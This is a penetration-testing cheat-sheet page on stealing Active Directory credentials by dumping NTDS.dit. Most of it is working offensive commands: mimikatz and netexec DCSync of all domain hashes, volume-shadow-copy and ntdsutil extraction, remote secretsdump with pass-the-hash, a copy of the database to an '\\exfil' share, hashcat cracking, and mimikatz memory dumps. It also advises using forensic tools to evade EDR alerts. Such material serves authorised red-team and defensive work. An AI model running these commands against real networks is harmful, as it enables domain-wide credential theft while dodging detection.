ad-adds-ntds-dumping.md (9545B)
1 --- 2 title: "Active Directory - NTDS Dumping" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adds-ntds-dumping.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-ntds-dumping.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - NTDS Dumping 12 13 You will need the following files to extract the ntds : 14 15 - NTDS.dit file 16 - SYSTEM hive (`C:\Windows\System32\SYSTEM`) 17 18 Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. 19 20 - `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). 21 - `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. 22 23 However you can change the location to a custom one, you will need to query the registry to get the current location. 24 25 ```powershell 26 reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" 27 ``` 28 29 ## DCSync Attack 30 31 DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. 32 33 - DCSync only one user 34 35 ```powershell 36 mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt 37 ``` 38 39 - DCSync all users of the domain 40 41 ```powershell 42 mimikatz# lsadump::dcsync /domain:htb.local /all /csv 43 44 netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds 45 netexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi 46 ``` 47 48 > :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. 49 50 ## Volume Shadow Copy 51 52 The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. 53 54 - [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) 55 56 ```powershell 57 vssadmin create shadow /for=C: 58 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy 59 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy 60 ``` 61 62 - [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) 63 64 ```powershell 65 ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q 66 ``` 67 68 - [Pennyw0rth/NetExec](https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-ntds.dit) - VSS module 69 70 ```powershell 71 nxc smb 10.10.0.202 -u username -p password --ntds vss 72 ``` 73 74 Alternate way to access a VSS snapshot in GUI: 75 76 - Select a snapshot, go to "Previous Versions" tab 77 - See the properties and recover the path in this format `@GMT-yyyy.MM.dd-HH.mm.ss` 78 79 ```ps1 80 Y:\@GMT-2025.07.10-13.05.00 81 ``` 82 83 ## Forensic Tools 84 85 A good method for avoiding or reducing detections involves using common forensic tools to dump the NTDS.dit file and the SYSTEM hive. By utilizing widely recognized and legitimate forensic software, the process can be conducted more discreetly and with a lower risk of triggering security alerts. 86 87 - Dump the memory with [magnet/dumpit](https://www.magnetforensics.com/resources/magnet-dumpit-for-windows/) 88 - Use volatility to extract the `SYSTEM` hive 89 90 ```ps1 91 volatility -f test.raw windows.registry.printkey.PrintKey 92 volatility --profile=Win10x64_14393 dumpregistry -o 0xaf0287e41000 -D output_vol -f test.raw 93 ``` 94 95 - Use [exterro/ftk-imager](https://www.exterro.com/digital-forensics-software/ftk-imager) to read the disk in raw state 96 - Go to `File` -> `Add Evidence Item` -> `Physical Drive` -> `Select the C drive`. 97 - Export `C:\Windows\NTDS\ntds.dit`. 98 - Finally use secretdump: `secretsdump.py LOCAL -system output_vol/registry.0xaf0287e41000.SYSTEM.reg -ntds ntds.dit` 99 100 ## Extract hashes from ntds.dit 101 102 Then you need to use [impacket/secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit 103 104 ```java 105 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL 106 ``` 107 108 [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely 109 110 ```java 111 ./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status 112 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 113 ``` 114 115 - `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. 116 - `-user-status`: Display whether or not the user is disabled. 117 118 ## Extract hashes from adamntds.dit 119 120 In AD LDS stores the data inside a dit file located at `C:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit`. 121 122 - Dump adamntds.dit with Shadow copy using `vssadmin.exe` 123 124 ```ps1 125 vssadmin.exe create shadow /For=C: 126 cp "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyX\Program files\Microsoft ADAM\instance1\data\adamntds.dit" \\exfil\data\adamntds.dit 127 ``` 128 129 - Dump adamntds.dit with Windows Server Backup using `wbadmin.exe` 130 131 ```ps1 132 wbadmin.exe start backup -backupTarget:e: -vssCopy -include:"C:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit" 133 wbadmin.exe start recovery -version:08/04/2023-12:59 -items:"c:\Program Files\Microsoft ADAM\instance1\data\adamntds.dit" -itemType:File -recoveryTarget:C:\Users\Administrator\Desktop\ -backupTarget:e: 134 ``` 135 136 - Extract hashes with [synacktiv/ntdissector](https://github.com/synacktiv/ntdissector) 137 138 ```ps1 139 ntdissector path/to/adamntds.dit 140 python ntdissector/tools/user_to_secretsdump.py path/to/output/*.json 141 ``` 142 143 ## Crack NTLM hashes with hashcat 144 145 Useful when you want to have the clear text password or when you need to make stats about weak passwords. 146 147 Recommended wordlists: 148 149 - [Rockyou.txt](https://weakpass.com/wordlist/90) 150 - [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) 151 - [Weakpass.com](https://weakpass.com/) 152 - Read More at [Methodology and Resources/Hash Cracking.md](/internal/cheatsheets/hash-cracking) 153 154 ```powershell 155 # Basic wordlist 156 # (-O) will Optimize for 32 characters or less passwords 157 # (-w 4) will set the workload to "Insane" 158 $ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 159 160 # Generate a custom mask based on a wordlist 161 $ git clone https://github.com/iphelix/pack/blob/master/README 162 $ python2 statsgen.py ../hashcat.potfile -o hashcat.mask 163 $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask 164 ``` 165 166 :warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : 167 168 - [hashmob.net](https://hashmob.net) 169 - [crackstation.net](https://crackstation.net) 170 - [hashes.com](https://hashes.com/en/decrypt/hash) 171 172 ## NTDS Reversible Encryption 173 174 `UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. 175 176 The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. 177 This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. 178 179 - List users with "Store passwords using reversible encryption" enabled 180 181 ```powershell 182 Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl 183 ``` 184 185 The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. 186 187 ## Extract hashes from memory 188 189 Dumps credential data in an Active Directory domain when run on a Domain Controller. 190 191 :warning: Requires administrator access with debug privilege or NT-AUTHORITY\SYSTEM account. 192 193 ```powershell 194 mimikatz> privilege::debug 195 mimikatz> sekurlsa::krbtgt 196 mimikatz> lsadump::lsa /inject /name:krbtgt 197 ``` 198 199 ## References 200 201 - [Bypassing EDR NTDS.dit protection using BlueTeam tools - bilal al-qurneh - June 9, 2024](https://medium.com/@0xcc00/bypassing-edr-ntds-dit-protection-using-blueteam-tools-1d161a554f9f) 202 - [Diskshadow The Return Of VSS Evasion Persistence And AD Db Extraction - bohops - March 26, 2018](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) 203 - [Dumping Domain Password Hashes - Pentestlab - July 4, 2018](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) 204 - [Using Ntdissector To Extract Secrets From Adam Ntds Files - Julien Legras, Mehdi Elyassa - December 06, 2023](https://www.synacktiv.com/publications/using-ntdissector-to-extract-secrets-from-adam-ntds-files)